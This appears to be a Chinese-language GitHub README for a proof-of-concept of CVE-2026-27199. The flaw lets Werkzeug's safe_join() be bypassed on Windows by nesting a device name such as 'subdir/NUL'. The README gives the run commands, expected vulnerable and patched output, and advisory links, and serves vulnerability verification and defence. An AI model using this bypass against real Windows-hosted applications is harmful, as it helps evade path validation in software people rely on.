alimezar/CVE-2026-27199-werkzeug-safe-join-bypass-PoC

# CVE-2026-27199 PoC: Werkzeug `safe_join()` Windows 设备名绕过 ## 受影响版本 | 软件包 | 受影响版本 | 已修复版本 | |-----------|-----------|---------| | werkzeug | `< 3.1.6` | `3.1.6` | ## 概念验证 ``` pip install "werkzeug==3.1.5" python poc_CVE-2026-27199.py ``` ### 预期输出（受影响版本） ``` ============================================================ CVE-2026-27199 — Werkzeug safe_join() PoC ============================================================ [*] Werkzeug version : 3.1.5 [*] os.name : nt [+] safe_join(base, 'NUL') -> None (correctly blocked) [!] safe_join(base, 'subdir/NUL') -> C:\...\subdir\NUL (bypass!) [*] Attempting to write to the returned path ... [!] open(nested NUL) write: SUCCESS — data silently discarded by device [!] VULNERABLE: CVE-2026-27199 confirmed on this installation. Upgrade to werkzeug >= 3.1.6 to remediate. ``` ### 预期输出（已修复版本） ``` [+] safe_join(base, 'subdir/NUL') -> None (correctly blocked) [+] NOT VULNERABLE: nested device name was blocked. ``` ## 参考资料 - [GHSA-29vq-49wr-vm6x](https://github.com/advisories/GHSA-29vq-49wr-vm6x) — 此公告 - [GHSA-hgf8-39gv-g3f2](https://github.com/advisories/GHSA-hgf8-39gv-g3f2) — 之前的相关公告 - [GHSA-87hc-h4r5-73f7](https://github.com/advisories/GHSA-87hc-h4r5-73f7) — 之前的相关公告 - [Werkzeug 更新日志](https://werkzeug.palletsprojects.com/en/stable/changes/) *本 PoC 依据负责任披露及公开补丁发布原则，仅用于教育和防御目的。*

标签：CVE-2026-27199, Flask, Maven, NTFS特性, PoC, safe_join绕过, Werkzeug, Windows设备名, 中间件安全, 任意文件写入, 安全测试, 攻击性安全, 暴力破解, 漏洞验证, 网络信息收集, 网络安全审计, 路径遍历, 逆向工具